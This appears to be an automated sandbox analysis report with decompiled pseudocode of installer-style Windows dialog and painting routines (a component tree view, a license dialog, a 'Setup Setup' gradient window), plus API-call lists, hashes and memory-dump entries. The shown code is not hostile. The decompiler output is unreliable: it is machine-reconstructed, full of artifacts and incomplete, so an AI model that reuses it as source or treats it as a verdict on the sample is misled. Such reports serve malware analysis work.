                                                                                			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                				struct HWND__* _v8;
                                                                                				struct HWND__* _v12;
                                                                                				long _v16;
                                                                                				signed int _v20;
                                                                                				signed int _v24;
                                                                                				intOrPtr _v28;
                                                                                				signed char* _v32;
                                                                                				int _v36;
                                                                                				signed int _v44;
                                                                                				int _v48;
                                                                                				signed int* _v60;
                                                                                				signed char* _v64;
                                                                                				signed int _v68;
                                                                                				long _v72;
                                                                                				void* _v76;
                                                                                				intOrPtr _v80;
                                                                                				intOrPtr _v84;
                                                                                				void* _v88;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t203;
                                                                                				intOrPtr _t206;
                                                                                				intOrPtr _t207;
                                                                                				long _t212;
                                                                                				signed int _t216;
                                                                                				signed int _t227;
                                                                                				void* _t230;
                                                                                				void* _t231;
                                                                                				int _t237;
                                                                                				long _t242;
                                                                                				long _t243;
                                                                                				signed int _t244;
                                                                                				signed int _t250;
                                                                                				signed int _t252;
                                                                                				signed char _t253;
                                                                                				signed char _t259;
                                                                                				void* _t264;
                                                                                				void* _t266;
                                                                                				signed char* _t284;
                                                                                				signed char _t285;
                                                                                				long _t290;
                                                                                				signed int _t300;
                                                                                				signed int _t308;
                                                                                				signed char* _t316;
                                                                                				int _t320;
                                                                                				int _t321;
                                                                                				signed int* _t322;
                                                                                				int _t323;
                                                                                				long _t324;
                                                                                				signed int _t325;
                                                                                				long _t327;
                                                                                				int _t328;
                                                                                				signed int _t329;
                                                                                				void* _t331;
                                                                                
                                                                                				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                				_v8 = GetDlgItem(_a4, 0x408);
                                                                                				_t331 = SendMessageA;
                                                                                				_v24 =  *0x42f488;
                                                                                				_v28 =  *0x42f454 + 0x94;
                                                                                				_t320 = 0x10;
                                                                                				if(_a8 != 0x110) {
                                                                                					L23:
                                                                                					if(_a8 != 0x405) {
                                                                                						_t298 = _a16;
                                                                                					} else {
                                                                                						_a12 = 0;
                                                                                						_t298 = 1;
                                                                                						_a8 = 0x40f;
                                                                                						_a16 = 1;
                                                                                					}
                                                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                						_v16 = _t298;
                                                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                                                							if(( *0x42f45d & 0x00000002) != 0) {
                                                                                								L41:
                                                                                								if(_v16 != 0) {
                                                                                									_t242 = _v16;
                                                                                									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                                                										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                									}
                                                                                									_t243 = _v16;
                                                                                									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                                                										_t298 = _v24;
                                                                                										_t244 =  *(_t243 + 0x5c);
                                                                                										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                                                										} else {
                                                                                											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								goto L48;
                                                                                							}
                                                                                							if(_a8 == 0x413) {
                                                                                								L33:
                                                                                								_t298 = 0 | _a8 != 0x00000413;
                                                                                								_t250 = E00404C24(_v8, _a8 != 0x413);
                                                                                								_t325 = _t250;
                                                                                								if(_t325 >= 0) {
                                                                                									_t99 = _v24 + 8; // 0x8
                                                                                									_t298 = _t250 * 0x418 + _t99;
                                                                                									_t252 =  *_t298;
                                                                                									if((_t252 & 0x00000010) == 0) {
                                                                                										if((_t252 & 0x00000040) == 0) {
                                                                                											_t253 = _t252 ^ 0x00000001;
                                                                                										} else {
                                                                                											_t259 = _t252 ^ 0x00000080;
                                                                                											if(_t259 >= 0) {
                                                                                												_t253 = _t259 & 0x000000fe;
                                                                                											} else {
                                                                                												_t253 = _t259 | 0x00000001;
                                                                                											}
                                                                                										}
                                                                                										 *_t298 = _t253;
                                                                                										E0040117D(_t325);
                                                                                										_a12 = _t325 + 1;
                                                                                										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
                                                                                										_a8 = 0x40f;
                                                                                									}
                                                                                								}
                                                                                								goto L41;
                                                                                							}
                                                                                							_t298 = _a16;
                                                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                								goto L41;
                                                                                							}
                                                                                							goto L33;
                                                                                						} else {
                                                                                							goto L48;
                                                                                						}
                                                                                					} else {
                                                                                						L48:
                                                                                						if(_a8 != 0x111) {
                                                                                							L56:
                                                                                							if(_a8 == 0x200) {
                                                                                								SendMessageA(_v8, 0x200, 0, 0);
                                                                                							}
                                                                                							if(_a8 == 0x40b) {
                                                                                								_t230 =  *0x42a89c;
                                                                                								if(_t230 != 0) {
                                                                                									ImageList_Destroy(_t230);
                                                                                								}
                                                                                								_t231 =  *0x42a8b0;
                                                                                								if(_t231 != 0) {
                                                                                									GlobalFree(_t231);
                                                                                								}
                                                                                								 *0x42a89c = 0;
                                                                                								 *0x42a8b0 = 0;
                                                                                								 *0x42f4c0 = 0;
                                                                                							}
                                                                                							if(_a8 != 0x40f) {
                                                                                								L90:
                                                                                								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
                                                                                									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                                                									ShowWindow(_v8, _t321);
                                                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                                                								}
                                                                                								goto L93;
                                                                                							} else {
                                                                                								E004011EF(_t298, 0, 0);
                                                                                								_t203 = _a12;
                                                                                								if(_t203 != 0) {
                                                                                									if(_t203 != 0xffffffff) {
                                                                                										_t203 = _t203 - 1;
                                                                                									}
                                                                                									_push(_t203);
                                                                                									_push(8);
                                                                                									E00404CA4();
                                                                                								}
                                                                                								if(_a16 == 0) {
                                                                                									L75:
                                                                                									E004011EF(_t298, 0, 0);
                                                                                									_v36 =  *0x42a8b0;
                                                                                									_t206 =  *0x42f488;
                                                                                									_v64 = 0xf030;
                                                                                									_v24 = 0;
                                                                                									if( *0x42f48c <= 0) {
                                                                                										L86:
                                                                                										if( *0x42f44c == 4) {
                                                                                											InvalidateRect(_v8, 0, 1);
                                                                                										}
                                                                                										_t207 =  *0x42ec1c; // 0x6aacde
                                                                                										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                                                											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
                                                                                										}
                                                                                										goto L90;
                                                                                									}
                                                                                									_t322 = _t206 + 8;
                                                                                									do {
                                                                                										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                										if(_t212 != 0) {
                                                                                											_t300 =  *_t322;
                                                                                											_v72 = _t212;
                                                                                											_v76 = 8;
                                                                                											if((_t300 & 0x00000001) != 0) {
                                                                                												_v76 = 9;
                                                                                												_v60 =  &(_t322[4]);
                                                                                												_t322[0] = _t322[0] & 0x000000fe;
                                                                                											}
                                                                                											if((_t300 & 0x00000040) == 0) {
                                                                                												_t216 = (_t300 & 0x00000001) + 1;
                                                                                												if((_t300 & 0x00000010) != 0) {
                                                                                													_t216 = _t216 + 3;
                                                                                												}
                                                                                											} else {
                                                                                												_t216 = 3;
                                                                                											}
                                                                                											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                                                											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                                                										}
                                                                                										_v24 = _v24 + 1;
                                                                                										_t322 =  &(_t322[0x106]);
                                                                                									} while (_v24 <  *0x42f48c);
                                                                                									goto L86;
                                                                                								} else {
                                                                                									_t323 = E004012E2( *0x42a8b0);
                                                                                									E00401299(_t323);
                                                                                									_t227 = 0;
                                                                                									_t298 = 0;
                                                                                									if(_t323 <= 0) {
                                                                                										L74:
                                                                                										SendMessageA(_v12, 0x14e, _t298, 0);
                                                                                										_a16 = _t323;
                                                                                										_a8 = 0x420;
                                                                                										goto L75;
                                                                                									} else {
                                                                                										goto L71;
                                                                                									}
                                                                                									do {
                                                                                										L71:
                                                                                										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                                                											_t298 = _t298 + 1;
                                                                                										}
                                                                                										_t227 = _t227 + 1;
                                                                                									} while (_t227 < _t323);
                                                                                									goto L74;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                							goto L93;
                                                                                						} else {
                                                                                							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                                                							if(_t237 == 0xffffffff) {
                                                                                								goto L93;
                                                                                							}
                                                                                							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                                                							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                                                								_t324 = 0x20;
                                                                                							}
                                                                                							E00401299(_t324);
                                                                                							SendMessageA(_a4, 0x420, 0, _t324);
                                                                                							_a12 = _a12 | 0xffffffff;
                                                                                							_a16 = 0;
                                                                                							_a8 = 0x40f;
                                                                                							goto L56;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_v36 = 0;
                                                                                					 *0x42f4c0 = _a4;
                                                                                					_v20 = 2;
                                                                                					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
                                                                                					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
                                                                                					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
                                                                                					_v16 = _t264;
                                                                                					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
                                                                                					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                                                					 *0x42a89c = _t266;
                                                                                					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                                                					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
                                                                                					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                                                						SendMessageA(_v8, 0x111b, _t320, 0);
                                                                                					}
                                                                                					DeleteObject(_v16);
                                                                                					_t327 = 0;
                                                                                					do {
                                                                                						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                                                						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                                                							if(_t327 != 0x20) {
                                                                                								_v20 = 0;
                                                                                							}
                                                                                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
                                                                                						}
                                                                                						_t327 = _t327 + 1;
                                                                                					} while (_t327 < 0x21);
                                                                                					_t328 = _a16;
                                                                                					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                                                					_push(0x15);
                                                                                					E004042D1(_a4);
                                                                                					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                                                					_push(0x16);
                                                                                					E004042D1(_a4);
                                                                                					_t329 = 0;
                                                                                					_v16 = 0;
                                                                                					if( *0x42f48c <= 0) {
                                                                                						L19:
                                                                                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                						goto L20;
                                                                                					} else {
                                                                                						_t316 = _v24 + 8;
                                                                                						_v32 = _t316;
                                                                                						do {
                                                                                							_t284 =  &(_t316[0x10]);
                                                                                							if( *_t284 != 0) {
                                                                                								_v64 = _t284;
                                                                                								_t285 =  *_t316;
                                                                                								_v88 = _v16;
                                                                                								_t308 = 0x20;
                                                                                								_v84 = 0xffff0002;
                                                                                								_v80 = 0xd;
                                                                                								_v68 = _t308;
                                                                                								_v44 = _t329;
                                                                                								_v72 = _t285 & _t308;
                                                                                								if((_t285 & 0x00000002) == 0) {
                                                                                									if((_t285 & 0x00000004) == 0) {
                                                                                										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                									} else {
                                                                                										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                                                									}
                                                                                								} else {
                                                                                									_v80 = 0x4d;
                                                                                									_v48 = 1;
                                                                                									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                									_v36 = 1;
                                                                                									 *( *0x42a8b0 + _t329 * 4) = _t290;
                                                                                									_v16 =  *( *0x42a8b0 + _t329 * 4);
                                                                                								}
                                                                                							}
                                                                                							_t329 = _t329 + 1;
                                                                                							_t316 =  &(_v32[0x418]);
                                                                                							_v32 = _t316;
                                                                                						} while (_t329 <  *0x42f48c);
                                                                                						if(_v36 != 0) {
                                                                                							L20:
                                                                                							if(_v20 != 0) {
                                                                                								E00404306(_v8);
                                                                                								goto L23;
                                                                                							} else {
                                                                                								ShowWindow(_v12, 5);
                                                                                								E00404306(_v12);
                                                                                								L93:
                                                                                								return E00404338(_a8, _a12, _a16);
                                                                                							}
                                                                                						}
                                                                                						goto L19;
                                                                                					}
                                                                                				}
                                                                                			}


























































                                                                                0x00404ecb
                                                                                0x00404eda
                                                                                0x00404eda
                                                                                0x00404e8d
                                                                                0x00404e90
                                                                                0x00404e9e
                                                                                0x00404ea8
                                                                                0x00404eb0
                                                                                0x00404eb7
                                                                                0x00404ec2
                                                                                0x00404ec2
                                                                                0x00404e8b
                                                                                0x00404efa
                                                                                0x00404efb
                                                                                0x00404f07
                                                                                0x00404f07
                                                                                0x00404f13
                                                                                0x00404f2e
                                                                                0x00404f31
                                                                                0x00404f4e
                                                                                0x00000000
                                                                                0x00404f33
                                                                                0x00404f38
                                                                                0x00404f41
                                                                                0x004052d3
                                                                                0x004052e5
                                                                                0x004052e5
                                                                                0x00404f31
                                                                                0x00000000
                                                                                0x00404f13
                                                                                0x00404e46

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 00404CED
                                                                                • GetDlgItem.USER32 ref: 00404CFA
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                                • LoadImageA.USER32 ref: 00404D60
                                                                                • SetWindowLongA.USER32 ref: 00404D7A
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB6
                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC2
                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD2
                                                                                • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E02
                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E0E
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EA8
                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404ED8
                                                                                  • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEC
                                                                                • GetWindowLongA.USER32 ref: 00404F1A
                                                                                • SetWindowLongA.USER32 ref: 00404F28
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405033
                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405098
                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050AD
                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D1
                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F1
                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                                • GlobalFree.KERNEL32 ref: 00405116
                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040518F
                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00405238
                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405247
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                                • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                                • GetDlgItem.USER32 ref: 004052CA
                                                                                • ShowWindow.USER32(00000000), ref: 004052D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 2564846305-813528018
                                                                                • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                                • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                				char _v8;
                                                                                				signed int _v12;
                                                                                				void* _v16;
                                                                                				struct HWND__* _t52;
                                                                                				long _t86;
                                                                                				int _t98;
                                                                                				struct HWND__* _t99;
                                                                                				signed int _t100;
                                                                                				intOrPtr _t107;
                                                                                				intOrPtr _t109;
                                                                                				int _t110;
                                                                                				signed int* _t112;
                                                                                				signed int _t113;
                                                                                				char* _t114;
                                                                                				CHAR* _t115;
                                                                                
                                                                                				if(_a8 != 0x110) {
                                                                                					if(_a8 != 0x111) {
                                                                                						L11:
                                                                                						if(_a8 != 0x4e) {
                                                                                							if(_a8 == 0x40b) {
                                                                                								 *0x429884 =  *0x429884 + 1;
                                                                                							}
                                                                                							L25:
                                                                                							_t110 = _a16;
                                                                                							L26:
                                                                                							return E00404338(_a8, _a12, _t110);
                                                                                						}
                                                                                						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                						_t110 = _a16;
                                                                                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                							_v12 = _t100;
                                                                                							_v16 = _t109;
                                                                                							_v8 = 0x42e3e0;
                                                                                							if(_t100 - _t109 < 0x800) {
                                                                                								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                								_push(1);
                                                                                								_t40 =  &_v8; // 0x42e3e0
                                                                                								E004046E0(_a4,  *_t40);
                                                                                								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                								_t110 = _a16;
                                                                                							}
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                							goto L26;
                                                                                						} else {
                                                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                								SendMessageA( *0x42f448, 0x111, 1, 0);
                                                                                							}
                                                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                								SendMessageA( *0x42f448, 0x10, 0, 0);
                                                                                							}
                                                                                							return 1;
                                                                                						}
                                                                                					}
                                                                                					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
                                                                                						goto L25;
                                                                                					} else {
                                                                                						_t112 =  *0x42a090 + 0x14;
                                                                                						if(( *_t112 & 0x00000020) == 0) {
                                                                                							goto L25;
                                                                                						}
                                                                                						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                						E004046BC();
                                                                                						goto L11;
                                                                                					}
                                                                                				}
                                                                                				_t98 = _a16;
                                                                                				_t113 =  *(_t98 + 0x30);
                                                                                				if(_t113 < 0) {
                                                                                					_t107 =  *0x42ec1c; // 0x6aacde
                                                                                					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                				}
                                                                                				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                				_t114 = _t113 +  *0x42f498;
                                                                                				_push(0x22);
                                                                                				_a16 =  *_t114;
                                                                                				_v12 = _v12 & 0x00000000;
                                                                                				_t115 = _t114 + 1;
                                                                                				_v16 = _t115;
                                                                                				_v8 = E00404407;
                                                                                				E004042D1(_a4);
                                                                                				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                				_push(0x23);
                                                                                				E004042D1(_a4);
                                                                                				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                				E00404306(_t99);
                                                                                				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                				_t86 =  *( *0x42f454 + 0x68);
                                                                                				if(_t86 < 0) {
                                                                                					_t86 = GetSysColor( ~_t86);
                                                                                				}
                                                                                				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                				 *0x429884 = 0;
                                                                                				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                				 *0x429884 = 0;
                                                                                				return 0;
                                                                                			}



















                                                                                APIs
                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044C7
                                                                                • GetDlgItem.USER32 ref: 004044DB
                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044F9
                                                                                • GetSysColor.USER32(?), ref: 0040450A
                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404519
                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404528
                                                                                • lstrlenA.KERNEL32(?), ref: 0040452B
                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453A
                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040454F
                                                                                • GetDlgItem.USER32 ref: 004045B1
                                                                                • SendMessageA.USER32(00000000), ref: 004045B4
                                                                                • GetDlgItem.USER32 ref: 004045DF
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040461F
                                                                                • LoadCursorA.USER32 ref: 0040462E
                                                                                • SetCursor.USER32(00000000), ref: 00404637
                                                                                • LoadCursorA.USER32 ref: 0040464D
                                                                                • SetCursor.USER32(00000000), ref: 00404650
                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467C
                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404690
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                • String ID: N$B
                                                                                • API String ID: 3103080414-4074832742
                                                                                • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                                • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                				struct tagLOGBRUSH _v16;
                                                                                				struct tagRECT _v32;
                                                                                				struct tagPAINTSTRUCT _v96;
                                                                                				struct HDC__* _t70;
                                                                                				struct HBRUSH__* _t87;
                                                                                				struct HFONT__* _t94;
                                                                                				long _t102;
                                                                                				signed int _t126;
                                                                                				struct HDC__* _t128;
                                                                                				intOrPtr _t130;
                                                                                
                                                                                				if(_a8 == 0xf) {
                                                                                					_t130 =  *0x42f454;
                                                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                					_a8 = _t70;
                                                                                					GetClientRect(_a4,  &_v32);
                                                                                					_t126 = _v32.bottom;
                                                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                					while(_v32.top < _t126) {
                                                                                						_a12 = _t126 - _v32.top;
                                                                                						asm("cdq");
                                                                                						asm("cdq");
                                                                                						asm("cdq");
                                                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                						_t87 = CreateBrushIndirect( &_v16);
                                                                                						_v32.bottom = _v32.bottom + 4;
                                                                                						_a16 = _t87;
                                                                                						FillRect(_a8,  &_v32, _t87);
                                                                                						DeleteObject(_a16);
                                                                                						_v32.top = _v32.top + 4;
                                                                                					}
                                                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                						_a16 = _t94;
                                                                                						if(_t94 != 0) {
                                                                                							_t128 = _a8;
                                                                                							_v32.left = 0x10;
                                                                                							_v32.top = 8;
                                                                                							SetBkMode(_t128, 1);
                                                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                							_a8 = SelectObject(_t128, _a16);
                                                                                							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
                                                                                							SelectObject(_t128, _a8);
                                                                                							DeleteObject(_a16);
                                                                                						}
                                                                                					}
                                                                                					EndPaint(_a4,  &_v96);
                                                                                					return 0;
                                                                                				}
                                                                                				_t102 = _a16;
                                                                                				if(_a8 == 0x46) {
                                                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
                                                                                				}
                                                                                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                			}














                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32 ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32 ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
